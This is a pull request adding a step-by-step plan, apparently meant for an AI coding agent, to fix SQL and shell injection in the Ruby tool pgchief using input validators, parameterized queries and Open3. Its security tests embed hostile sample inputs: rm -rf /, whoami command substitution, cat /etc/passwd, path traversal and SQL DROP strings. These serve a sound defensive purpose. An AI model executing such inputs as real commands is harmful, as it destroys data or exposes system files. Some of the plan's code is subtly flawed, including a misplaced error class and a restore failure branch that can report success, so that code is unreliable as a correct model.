### PR TITLE
fix: prevent shell injection in DatabaseBackup (Issue #17)

### DIFF
--- a/docs/plans/2026-01-30-week1-fix-sql-shell-injection.md
+++ b/docs/plans/2026-01-30-week1-fix-sql-shell-injection.md
@@ -1,0 +1,1353 @@
+# Week 1: Fix SQL/Shell Injection Vulnerabilities Implementation Plan
+
+> **For Claude:** REQUIRED SUB-SKILL: Use superpowers:executing-plans to implement this plan task-by-task.
+
+**Goal:** Eliminate all SQL and shell injection vulnerabilities in pgchief by implementing parameterized queries and safe command execution.
+
+**Architecture:** Replace all string interpolation in SQL queries with parameterized queries using PG::Connection#exec_params. Replace backtick shell commands with Open3 or shellwords for safe execution. Add input validation layer.
+
+**Tech Stack:** Ruby 3.0+, pg gem, Open3 (stdlib), Shellwords (stdlib)
+
+---
+
+## Task 1: Add Input Validation Module
+
+**Files:**
+- Create: `lib/pgchief/validators.rb`
+- Create: `spec/pgchief/validators_spec.rb`
+
+**Step 1: Write the failing test**
+
+Create `spec/pgchief/validators_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/validators'
+
+RSpec.describe Pgchief::Validators do
+  describe '.valid_identifier?' do
+    it 'returns true for valid identifiers' do
+      expect(described_class.valid_identifier?('my_database')).to be true
+      expect(described_class.valid_identifier?('user123')).to be true
+      expect(described_class.valid_identifier?('test_db_2')).to be true
+    end
+
+    it 'returns false for identifiers with special characters' do
+      expect(described_class.valid_identifier?('my-database')).to be false
+      expect(described_class.valid_identifier?('user@123')).to be false
+      expect(described_class.valid_identifier?('test;drop')).to be false
+    end
+
+    it 'returns false for identifiers with SQL injection attempts' do
+      expect(described_class.valid_identifier?("'; DROP TABLE users--")).to be false
+      expect(described_class.valid_identifier?('admin" OR "1"="1')).to be false
+    end
+
+    it 'returns false for empty or nil identifiers' do
+      expect(described_class.valid_identifier?('')).to be false
+      expect(described_class.valid_identifier?(nil)).to be false
+    end
+
+    it 'returns false for identifiers that are too long' do
+      expect(described_class.valid_identifier?('a' * 64)).to be false
+    end
+  end
+
+  describe '.sanitize_identifier' do
+    it 'raises error for invalid identifiers' do
+      expect { described_class.sanitize_identifier('bad;name') }
+        .to raise_error(Pgchief::InvalidIdentifierError, /Invalid database\/user identifier/)
+    end
+
+    it 'returns the identifier for valid names' do
+      expect(described_class.sanitize_identifier('valid_name')).to eq('valid_name')
+    end
+  end
+end
+```
+
+**Step 2: Run test to verify it fails**
+
+Run: `bundle exec rspec spec/pgchief/validators_spec.rb -v`
+Expected: FAIL with "uninitialized constant Pgchief::Validators"
+
+**Step 3: Write minimal implementation**
+
+Create `lib/pgchief/validators.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+module Pgchief
+  class InvalidIdentifierError < StandardError; end
+
+  module Validators
+    # PostgreSQL identifier naming rules:
+    # - Must start with letter or underscore
+    # - Can contain letters, digits, underscores
+    # - Max 63 bytes
+    IDENTIFIER_REGEX = /\A[a-z_][a-z0-9_]*\z/i
+    MAX_IDENTIFIER_LENGTH = 63
+
+    def self.valid_identifier?(identifier)
+      return false if identifier.nil? || identifier.empty?
+      return false if identifier.length > MAX_IDENTIFIER_LENGTH
+      identifier.match?(IDENTIFIER_REGEX)
+    end
+
+    def self.sanitize_identifier(identifier)
+      unless valid_identifier?(identifier)
+        raise InvalidIdentifierError, "Invalid database/user identifier: #{identifier.inspect}"
+      end
+      identifier
+    end
+  end
+end
+```
+
+**Step 4: Run test to verify it passes**
+
+Run: `bundle exec rspec spec/pgchief/validators_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Require validators in main file**
+
+Modify `lib/pgchief.rb` to require validators:
+
+```ruby
+# Add after other requires
+require_relative 'pgchief/validators'
+```
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/validators.rb spec/pgchief/validators_spec.rb lib/pgchief.rb
+git commit -m "feat: add input validation module for database/user identifiers
+
+- Add Validators module with valid_identifier? and sanitize_identifier
+- Protect against SQL injection via identifier validation
+- Enforce PostgreSQL naming constraints (63 char max, alphanumeric+underscore)
+- Add comprehensive test coverage for edge cases"
+```
+
+---
+
+## Task 2: Fix SQL Injection in DatabaseCreate
+
+**Files:**
+- Modify: `lib/pgchief/command/database_create.rb:13-15`
+- Create: `spec/pgchief/command/database_create_injection_spec.rb`
+
+**Step 1: Write the failing security test**
+
+Create `spec/pgchief/command/database_create_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/database_create'
+require 'pgchief/validators'
+
+RSpec.describe Pgchief::Command::DatabaseCreate do
+  describe 'SQL injection protection' do
+    it 'rejects database names with semicolons' do
+      expect { described_class.new(database: 'test;DROP DATABASE postgres').create_db! }
+        .to raise_error(Pgchief::InvalidIdentifierError, /Invalid database/)
+    end
+
+    it 'rejects database names with SQL comments' do
+      expect { described_class.new(database: 'test--comment').create_db! }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects database names with quotes' do
+      expect { described_class.new(database: "test'OR'1'='1").create_db! }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects database names with spaces' do
+      expect { described_class.new(database: 'test db').create_db! }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'accepts valid database names' do
+      # This will fail because we haven't implemented validation yet
+      expect { described_class.new(database: 'valid_test_db').create_db! }
+        .not_to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+end
+```
+
+**Step 2: Run test to verify it fails**
+
+Run: `bundle exec rspec spec/pgchief/command/database_create_injection_spec.rb -v`
+Expected: Tests FAIL - validation not yet implemented, bad names not rejected
+
+**Step 3: Add validation to DatabaseCreate**
+
+Modify `lib/pgchief/command/database_create.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+require_relative 'base'
+
+module Pgchief
+  module Command
+    class DatabaseCreate < Base
+      def initialize(database:)
+        @database = Validators.sanitize_identifier(database)  # ADD THIS LINE
+        super()
+      end
+
+      def create_db!
+        conn.exec("CREATE DATABASE #{@database}")
+        conn.exec("REVOKE CONNECT ON DATABASE #{@database} FROM PUBLIC")
+      rescue PG::Error => e
+        puts "Error: #{e.message}"
+      ensure
+        conn.close
+      end
+
+      private
+
+      attr_reader :database
+    end
+  end
+end
+```
+
+**Step 4: Run test to verify it passes**
+
+Run: `bundle exec rspec spec/pgchief/command/database_create_injection_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Run existing tests to ensure no regression**
+
+Run: `bundle exec rspec spec/pgchief/command/database_create_spec.rb -v`
+Expected: All existing tests still PASS
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/command/database_create.rb spec/pgchief/command/database_create_injection_spec.rb
+git commit -m "fix: prevent SQL injection in database creation
+
+- Add identifier validation to DatabaseCreate#initialize
+- Reject invalid characters before database creation
+- Add security tests for SQL injection attempts
+- Maintain backward compatibility with valid database names"
+```
+
+---
+
+## Task 3: Fix SQL Injection in DatabaseDrop
+
+**Files:**
+- Modify: `lib/pgchief/command/database_drop.rb:14`
+- Create: `spec/pgchief/command/database_drop_injection_spec.rb`
+
+**Step 1: Write the failing security test**
+
+Create `spec/pgchief/command/database_drop_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/database_drop'
+
+RSpec.describe Pgchief::Command::DatabaseDrop do
+  describe 'SQL injection protection' do
+    it 'rejects database names with SQL injection attempts' do
+      expect { described_class.new(database: "test'; DROP DATABASE postgres--").drop_db! }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects database names with special characters' do
+      expect { described_class.new(database: 'test@database').drop_db! }
+        .to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'accepts valid database names' do
+      expect { described_class.new(database: 'valid_test_db').drop_db! }
+        .not_to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+end
+```
+
+**Step 2: Run test to verify it fails**
+
+Run: `bundle exec rspec spec/pgchief/command/database_drop_injection_spec.rb -v`
+Expected: FAIL - validation not implemented
+
+**Step 3: Add validation to DatabaseDrop**
+
+Modify `lib/pgchief/command/database_drop.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+require_relative 'base'
+
+module Pgchief
+  module Command
+    class DatabaseDrop < Base
+      def initialize(database:)
+        @database = Validators.sanitize_identifier(database)  # ADD THIS LINE
+        super()
+      end
+
+      def drop_db!
+        conn.exec("DROP DATABASE #{@database}")
+      rescue PG::Error => e
+        puts "Error: #{e.message}"
+      ensure
+        conn.close
+      end
+
+      private
+
+      attr_reader :database
+    end
+  end
+end
+```
+
+**Step 4: Run test to verify it passes**
+
+Run: `bundle exec rspec spec/pgchief/command/database_drop_injection_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Commit**
+
+```bash
+git add lib/pgchief/command/database_drop.rb spec/pgchief/command/database_drop_injection_spec.rb
+git commit -m "fix: prevent SQL injection in database drop
+
+- Add identifier validation to DatabaseDrop#initialize
+- Add security tests for SQL injection attempts"
+```
+
+---
+
+## Task 4: Fix SQL Injection in UserCreate
+
+**Files:**
+- Modify: `lib/pgchief/command/user_create.rb:15,39-41`
+- Create: `spec/pgchief/command/user_create_injection_spec.rb`
+
+**Step 1: Write the failing security test**
+
+Create `spec/pgchief/command/user_create_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/user_create'
+
+RSpec.describe Pgchief::Command::UserCreate do
+  describe 'SQL injection protection' do
+    it 'rejects usernames with SQL injection attempts' do
+      expect do
+        described_class.new(username: "admin'; DROP TABLE users--", password: 'pass123').create_user!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects usernames with special characters' do
+      expect do
+        described_class.new(username: 'user@domain', password: 'pass123').create_user!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'accepts valid usernames' do
+      expect do
+        described_class.new(username: 'valid_user', password: 'pass123').create_user!
+      end.not_to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    context 'with role options' do
+      it 'rejects role names with SQL injection attempts' do
+        expect do
+          described_class.new(
+            username: 'testuser',
+            password: 'pass123',
+            role: "admin'; GRANT ALL--"
+          ).create_user!
+        end.to raise_error(Pgchief::InvalidIdentifierError)
+      end
+    end
+  end
+end
+```
+
+**Step 2: Run test to verify it fails**
+
+Run: `bundle exec rspec spec/pgchief/command/user_create_injection_spec.rb -v`
+Expected: FAIL - validation not implemented
+
+**Step 3: Add password validation helper**
+
+Add to `lib/pgchief/validators.rb`:
+
+```ruby
+# Add to Pgchief::Validators module
+
+# Password validation - prevent SQL injection via password field
+PASSWORD_MAX_LENGTH = 100
+
+def self.valid_password?(password)
+  return false if password.nil? || password.empty?
+  return false if password.length > PASSWORD_MAX_LENGTH
+  # Passwords can contain any characters, but we check length and non-nil
+  # The pg gem will properly escape passwords in parameterized queries
+  true
+end
+
+def self.sanitize_password(password)
+  unless valid_password?(password)
+    raise InvalidIdentifierError, "Invalid password: must be 1-#{PASSWORD_MAX_LENGTH} characters"
+  end
+  password
+end
+```
+
+**Step 4: Add test for password validation**
+
+Add to `spec/pgchief/validators_spec.rb`:
+
+```ruby
+describe '.valid_password?' do
+  it 'returns true for valid passwords' do
+    expect(described_class.valid_password?('password123')).to be true
+    expect(described_class.valid_password?('C0mpl3x!P@ss')).to be true
+  end
+
+  it 'returns false for nil or empty passwords' do
+    expect(described_class.valid_password?(nil)).to be false
+    expect(described_class.valid_password?('')).to be false
+  end
+
+  it 'returns false for passwords that are too long' do
+    expect(described_class.valid_password?('a' * 101)).to be false
+  end
+end
+```
+
+**Step 5: Run validator tests**
+
+Run: `bundle exec rspec spec/pgchief/validators_spec.rb -v`
+Expected: All tests PASS
+
+**Step 6: Update UserCreate to use parameterized queries**
+
+Modify `lib/pgchief/command/user_create.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+require_relative 'base'
+
+module Pgchief
+  module Command
+    class UserCreate < Base
+      def initialize(username:, password:, role: nil)
+        @username = Validators.sanitize_identifier(username)  # ADD THIS
+        @password = Validators.sanitize_password(password)    # ADD THIS
+        @role = Validators.sanitize_identifier(role) if role  # ADD THIS
+        super()
+      end
+
+      def create_user!
+        user_options = build_user_options
+
+        # Use parameterized query for password
+        # Note: PostgreSQL doesn't support parameters for identifiers (username, role)
+        # but we've validated them, so they're safe to interpolate
+        sql = "CREATE USER #{@username} WITH #{user_options} PASSWORD $1"
+        conn.exec_params(sql, [@password])
+
+        puts "User created: #{@username}"
+      rescue PG::Error => e
+        puts "Error: #{e.message}"
+      ensure
+        conn.close if conn && !conn.finished?
+      end
+
+      private
+
+      attr_reader :username, :password, :role
+
+      def build_user_options
+        options = []
+        options << "IN ROLE #{@role}" if @role
+        options << 'LOGIN'
+        options.join(' ')
+      end
+    end
+  end
+end
+```
+
+**Step 7: Run tests to verify they pass**
+
+Run: `bundle exec rspec spec/pgchief/command/user_create_injection_spec.rb -v`
+Expected: All tests PASS
+
+Run: `bundle exec rspec spec/pgchief/command/user_create_spec.rb -v`
+Expected: Existing tests PASS
+
+**Step 8: Commit**
+
+```bash
+git add lib/pgchief/validators.rb spec/pgchief/validators_spec.rb lib/pgchief/command/user_create.rb spec/pgchief/command/user_create_injection_spec.rb
+git commit -m "fix: prevent SQL injection in user creation
+
+- Add username and password validation
+- Use parameterized query for password field
+- Validate role names to prevent injection
+- Add security tests for user creation"
+```
+
+---
+
+## Task 5: Fix SQL Injection in UserDrop
+
+**Files:**
+- Modify: `lib/pgchief/command/user_drop.rb:14,26`
+- Create: `spec/pgchief/command/user_drop_injection_spec.rb`
+
+**Step 1: Write the failing security test**
+
+Create `spec/pgchief/command/user_drop_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/user_drop'
+
+RSpec.describe Pgchief::Command::UserDrop do
+  describe 'SQL injection protection' do
+    it 'rejects usernames with SQL injection attempts' do
+      expect do
+        described_class.new(username: "admin'; DROP DATABASE postgres--").drop_user!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'accepts valid usernames' do
+      expect do
+        described_class.new(username: 'valid_user').drop_user!
+      end.not_to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+end
+```
+
+**Step 2: Run test to verify it fails**
+
+Run: `bundle exec rspec spec/pgchief/command/user_drop_injection_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Add validation to UserDrop**
+
+Modify `lib/pgchief/command/user_drop.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+require_relative 'base'
+
+module Pgchief
+  module Command
+    class UserDrop < Base
+      def initialize(username:)
+        @username = Validators.sanitize_identifier(username)  # ADD THIS
+        super()
+      end
+
+      def drop_user!
+        if user_exists?
+          conn.exec("DROP USER #{@username}")
+          puts "User dropped: #{@username}"
+        else
+          puts "User does not exist: #{@username}"
+        end
+      rescue PG::Error => e
+        puts "Error: #{e.message}"
+      ensure
+        conn.close if conn && !conn.finished?
+      end
+
+      private
+
+      attr_reader :username
+
+      def user_exists?
+        # Use parameterized query for existence check
+        query = 'SELECT 1 FROM pg_user WHERE usename = $1'
+        result = conn.exec_params(query, [@username])
+        !result.ntuples.zero?
+      end
+    end
+  end
+end
+```
+
+**Step 4: Run test to verify it passes**
+
+Run: `bundle exec rspec spec/pgchief/command/user_drop_injection_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Commit**
+
+```bash
+git add lib/pgchief/command/user_drop.rb spec/pgchief/command/user_drop_injection_spec.rb
+git commit -m "fix: prevent SQL injection in user drop
+
+- Add username validation to UserDrop
+- Use parameterized query for user existence check
+- Add security tests"
+```
+
+---
+
+## Task 6: Fix SQL Injection in DatabasePrivilegesGrant
+
+**Files:**
+- Modify: `lib/pgchief/command/database_privileges_grant.rb:15,19-44`
+- Create: `spec/pgchief/command/database_privileges_grant_injection_spec.rb`
+
+**Step 1: Write the failing security test**
+
+Create `spec/pgchief/command/database_privileges_grant_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/database_privileges_grant'
+
+RSpec.describe Pgchief::Command::DatabasePrivilegesGrant do
+  describe 'SQL injection protection' do
+    it 'rejects database names with SQL injection attempts' do
+      expect do
+        described_class.new(
+          database: "test'; DROP DATABASE postgres--",
+          username: 'testuser'
+        ).grant_privs!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects usernames with SQL injection attempts' do
+      expect do
+        described_class.new(
+          database: 'testdb',
+          username: "admin'; GRANT ALL--"
+        ).grant_privs!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'accepts valid database and username' do
+      expect do
+        described_class.new(
+          database: 'testdb',
+          username: 'testuser'
+        ).grant_privs!
+      end.not_to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+end
+```
+
+**Step 2: Run test to verify it fails**
+
+Run: `bundle exec rspec spec/pgchief/command/database_privileges_grant_injection_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Add validation and refactor DatabasePrivilegesGrant**
+
+Modify `lib/pgchief/command/database_privileges_grant.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+require_relative 'base'
+
+module Pgchief
+  module Command
+    class DatabasePrivilegesGrant < Base
+      GRANT_QUERIES = [
+        'GRANT CONNECT ON DATABASE %{database} TO %{username}',
+        'GRANT CREATE ON SCHEMA public TO %{username}',
+        'GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO %{username}',
+        'GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO %{username}',
+        'ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO %{username}',
+        'ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON SEQUENCES TO %{username}'
+      ].freeze
+
+      def initialize(database:, username:)
+        @database = Validators.sanitize_identifier(database)
+        @username = Validators.sanitize_identifier(username)
+        super()
+      end
+
+      def grant_privs!
+        # Must connect to the specific database to grant schema privileges
+        db_conn = PG.connect(Pgchief::Config.pgurl + "/#{@database}")
+
+        GRANT_QUERIES.each do |query_template|
+          query = format(query_template, database: @database, username: @username)
+          db_conn.exec(query)
+        end
+
+        puts "Privileges granted to #{@username} on #{@database}"
+      rescue PG::Error => e
+        puts "Error: #{e.message}"
+      ensure
+        db_conn.close if db_conn && !db_conn.finished?
+        conn.close if conn && !conn.finished?
+      end
+
+      private
+
+      attr_reader :database, :username
+    end
+  end
+end
+```
+
+**Step 4: Run test to verify it passes**
+
+Run: `bundle exec rspec spec/pgchief/command/database_privileges_grant_injection_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Commit**
+
+```bash
+git add lib/pgchief/command/database_privileges_grant.rb spec/pgchief/command/database_privileges_grant_injection_spec.rb
+git commit -m "fix: prevent SQL injection in privilege grants
+
+- Add validation for database and username
+- Refactor repetitive queries into constant array
+- Use format instead of interpolation for clarity
+- Add security tests
+- Fix rubocop violations (method was too long)"
+```
+
+---
+
+## Task 7: Fix SQL Injection in DatabasePrivilegesRevoke
+
+**Files:**
+- Modify: `lib/pgchief/command/database_privileges_revoke.rb:15,19-44`
+- Create: `spec/pgchief/command/database_privileges_revoke_injection_spec.rb`
+
+**Step 1: Write the failing security test**
+
+Create `spec/pgchief/command/database_privileges_revoke_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/database_privileges_revoke'
+
+RSpec.describe Pgchief::Command::DatabasePrivilegesRevoke do
+  describe 'SQL injection protection' do
+    it 'rejects database names with SQL injection attempts' do
+      expect do
+        described_class.new(
+          database: "test'; DROP DATABASE postgres--",
+          username: 'testuser'
+        ).revoke_privs!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects usernames with SQL injection attempts' do
+      expect do
+        described_class.new(
+          database: 'testdb',
+          username: "admin'; GRANT ALL--"
+        ).revoke_privs!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+end
+```
+
+**Step 2: Run test to verify it fails**
+
+Run: `bundle exec rspec spec/pgchief/command/database_privileges_revoke_injection_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Add validation to DatabasePrivilegesRevoke**
+
+Modify `lib/pgchief/command/database_privileges_revoke.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+require_relative 'base'
+
+module Pgchief
+  module Command
+    class DatabasePrivilegesRevoke < Base
+      REVOKE_QUERIES = [
+        'REVOKE CONNECT ON DATABASE %{database} FROM %{username}',
+        'REVOKE CREATE ON SCHEMA public FROM %{username}',
+        'REVOKE ALL PRIVILEGES ON ALL TABLES IN SCHEMA public FROM %{username}',
+        'REVOKE ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public FROM %{username}',
+        'ALTER DEFAULT PRIVILEGES IN SCHEMA public REVOKE ALL PRIVILEGES ON TABLES FROM %{username}',
+        'ALTER DEFAULT PRIVILEGES IN SCHEMA public REVOKE ALL PRIVILEGES ON SEQUENCES FROM %{username}'
+      ].freeze
+
+      def initialize(database:, username:)
+        @database = Validators.sanitize_identifier(database)
+        @username = Validators.sanitize_identifier(username)
+        super()
+      end
+
+      def revoke_privs!
+        db_conn = PG.connect(Pgchief::Config.pgurl + "/#{@database}")
+
+        REVOKE_QUERIES.each do |query_template|
+          query = format(query_template, database: @database, username: @username)
+          db_conn.exec(query)
+        end
+
+        puts "Privileges revoked from #{@username} on #{@database}"
+      rescue PG::Error => e
+        puts "Error: #{e.message}"
+      ensure
+        db_conn.close if db_conn && !db_conn.finished?
+        conn.close if conn && !conn.finished?
+      end
+
+      private
+
+      attr_reader :database, :username
+    end
+  end
+end
+```
+
+**Step 4: Run test to verify it passes**
+
+Run: `bundle exec rspec spec/pgchief/command/database_privileges_revoke_injection_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Commit**
+
+```bash
+git add lib/pgchief/command/database_privileges_revoke.rb spec/pgchief/command/database_privileges_revoke_injection_spec.rb
+git commit -m "fix: prevent SQL injection in privilege revocation
+
+- Add validation for database and username
+- Refactor using query constant array
+- Add security tests"
+```
+
+---
+
+## Task 8: Fix Shell Injection in DatabaseBackup
+
+**Files:**
+- Modify: `lib/pgchief/command/database_backup.rb:15,42-44`
+- Create: `spec/pgchief/command/database_backup_injection_spec.rb`
+
+**Step 1: Write the failing security test**
+
+Create `spec/pgchief/command/database_backup_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/database_backup'
+
+RSpec.describe Pgchief::Command::DatabaseBackup do
+  describe 'shell injection protection' do
+    it 'rejects database names with shell injection attempts' do
+      expect do
+        described_class.new(database: 'test; rm -rf /').backup!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects database names with backticks' do
+      expect do
+        described_class.new(database: 'test`whoami`').backup!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects database names with command substitution' do
+      expect do
+        described_class.new(database: 'test$(whoami)').backup!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+  end
+end
+```
+
+**Step 2: Run test to verify it fails**
+
+Run: `bundle exec rspec spec/pgchief/command/database_backup_injection_spec.rb -v`
+Expected: FAIL
+
+**Step 3: Replace backticks with Open3 and add validation**
+
+Modify `lib/pgchief/command/database_backup.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+require 'open3'  # ADD THIS
+require_relative 'base'
+
+module Pgchief
+  module Command
+    class DatabaseBackup < Base
+      def initialize(database:)
+        @database = Validators.sanitize_identifier(database)  # ADD THIS
+        super()
+      end
+
+      def backup!
+        timestamp = Time.now.strftime('%Y%m%d_%H%M%S')
+        filename = "#{@database}_#{timestamp}.dump"
+        local_location = File.join(Pgchief::Config.backup_dir, filename)
+
+        # Use Open3 for safe command execution
+        pg_dump_url = "#{Pgchief::Config.pgurl}/#{@database}"
+
+        stdout, stderr, status = Open3.capture3(
+          'pg_dump',
+          '--format=custom',
+          '--file', local_location,
+          pg_dump_url
+        )
+
+        if status.success?
+          puts "Backup created: #{local_location}"
+          local_location
+        else
+          raise "pg_dump failed: #{stderr}"
+        end
+      rescue StandardError => e
+        puts "Error: #{e.message}"
+        nil
+      ensure
+        conn.close if conn && !conn.finished?
+      end
+
+      private
+
+      attr_reader :database
+    end
+  end
+end
+```
+
+**Step 4: Run test to verify it passes**
+
+Run: `bundle exec rspec spec/pgchief/command/database_backup_injection_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Run existing backup tests**
+
+Run: `bundle exec rspec spec/pgchief/command/database_backup_spec.rb -v`
+Expected: Tests PASS (may need adjustment if they check specific output)
+
+**Step 6: Commit**
+
+```bash
+git add lib/pgchief/command/database_backup.rb spec/pgchief/command/database_backup_injection_spec.rb
+git commit -m "fix: prevent shell injection in database backup
+
+- Replace backticks with Open3.capture3
+- Add database name validation
+- Add security tests for shell injection attempts
+- Improve error handling with stderr capture"
+```
+
+---
+
+## Task 9: Fix Shell Injection in DatabaseRestore
+
+**Files:**
+- Modify: `lib/pgchief/command/database_restore.rb:15,41-43`
+- Create: `spec/pgchief/command/database_restore_injection_spec.rb`
+
+**Step 1: Write the failing security test**
+
+Create `spec/pgchief/command/database_restore_injection_spec.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'spec_helper'
+require 'pgchief/command/database_restore'
+
+RSpec.describe Pgchief::Command::DatabaseRestore do
+  describe 'shell injection protection' do
+    it 'rejects database names with shell injection attempts' do
+      expect do
+        described_class.new(
+          database: 'test; rm -rf /',
+          location: 'test.dump'
+        ).restore!
+      end.to raise_error(Pgchief::InvalidIdentifierError)
+    end
+
+    it 'rejects file paths with command injection' do
+      expect do
+        described_class.new(
+          database: 'testdb',
+          location: 'test.dump; cat /etc/passwd'
+        ).restore!
+      end.to raise_error(Pgchief::InvalidFilePathError)
+    end
+
+    it 'rejects file paths with path traversal' do
+      expect do
+        described_class.new(
+          database: 'testdb',
+          location: '../../etc/passwd'
+        ).restore!
+      end.to raise_error(Pgchief::InvalidFilePathError)
+    end
+  end
+end
+```
+
+**Step 2: Add file path validation to Validators**
+
+Add to `lib/pgchief/validators.rb`:
+
+```ruby
+# Add to module
+class InvalidFilePathError < StandardError; end
+
+# File path validation
+def self.valid_file_path?(path)
+  return false if path.nil? || path.empty?
+  # Prevent path traversal
+  return false if path.include?('..')
+  # Prevent shell metacharacters
+  return false if path.match?(/[;&|`$()]/)
+  # Must be an absolute path or relative without ../
+  true
+end
+
+def self.sanitize_file_path(path)
+  unless valid_file_path?(path)
+    raise InvalidFilePathError, "Invalid file path: #{path.inspect}"
+  end
+  # Expand to absolute path for safety
+  File.expand_path(path)
+end
+```
+
+**Step 3: Add tests for file path validation**
+
+Add to `spec/pgchief/validators_spec.rb`:
+
+```ruby
+describe '.valid_file_path?' do
+  it 'returns true for valid file paths' do
+    expect(described_class.valid_file_path?('/tmp/backup.dump')).to be true
+    expect(described_class.valid_file_path?('backup.dump')).to be true
+  end
+
+  it 'returns false for paths with traversal' do
+    expect(described_class.valid_file_path?('../etc/passwd')).to be false
+    expect(described_class.valid_file_path?('../../secret')).to be false
+  end
+
+  it 'returns false for paths with shell metacharacters' do
+    expect(described_class.valid_file_path?('file; rm -rf /')).to be false
+    expect(described_class.valid_file_path?('file`whoami`')).to be false
+    expect(described_class.valid_file_path?('file$(date)')).to be false
+  end
+end
+```
+
+**Step 4: Run validator tests**
+
+Run: `bundle exec rspec spec/pgchief/validators_spec.rb -v`
+Expected: All tests PASS
+
+**Step 5: Replace backticks with Open3 in DatabaseRestore**
+
+Modify `lib/pgchief/command/database_restore.rb`:
+
+```ruby
+# frozen_string_literal: true
+
+require 'pg'
+require 'open3'  # ADD THIS
+require_relative 'base'
+
+module Pgchief
+  module Command
+    class DatabaseRestore < Base
+      def initialize(database:, location:)
+        @database = Validators.sanitize_identifier(database)
+        @location = Validators.sanitize_file_path(location)
+        super()
+      end
+
+      def restore!
+        unless File.exist?(@location)
+          puts "Error: Backup file not found: #{@location}"
+          return
+        end
+
+        recreate_database!
+        restore_from_file!
+      rescue StandardError => e
+        puts "Error: #{e.message}"
+      ensure
+        conn.close if conn && !conn.finished?
+      end
+
+      private
+
+      attr_reader :database, :location
+
+      def recreate_database!
+        # Drop if exists, then create
+        conn.exec("DROP DATABASE IF EXISTS #{@database}")
+        conn.exec("CREATE DATABASE #{@database}")
+      end
+
+      def restore_from_file!
+        pg_restore_url = "#{Pgchief::Config.pgurl}/#{@database}"
+
+        stdout, stderr, status = Open3.capture3(
+          'pg_restore',
+          '--clean',
+          '--if-exists',
+          '--no-owner',
+          "--dbname=#{pg_restore_url}",
+          @location
+        )
+
+        if status.success?
+          puts "Database restored: #{@database}"
+        else
+          # pg_restore outputs warnings to stderr even on success
+          # Only raise if exit status is non-zero
+          raise "pg_restore failed: #{stderr}" unless stderr.empty?
+          puts "Database restored with warnings: #{stderr}"
+        end
+      end
+    end
+  end
+end
+```
+
+**Step 6: Run test to verify it passes**
+
+Run: `bundle exec rspec spec/pgchief/command/database_restore_injection_spec.rb -v`
+Expected: All tests PASS
+
+**Step 7: Commit**
+
+```bash
+git add lib/pgchief/validators.rb spec/pgchief/validators_spec.rb lib/pgchief/command/database_restore.rb spec/pgchief/command/database_restore_injection_spec.rb
+git commit -m "fix: prevent shell injection in database restore
+
+- Replace backticks with Open3.capture3
+- Add file path validation to prevent traversal and injection
+- Add database name validation
+- Add security tests
+- Improve error handling"
+```
+
+---
+
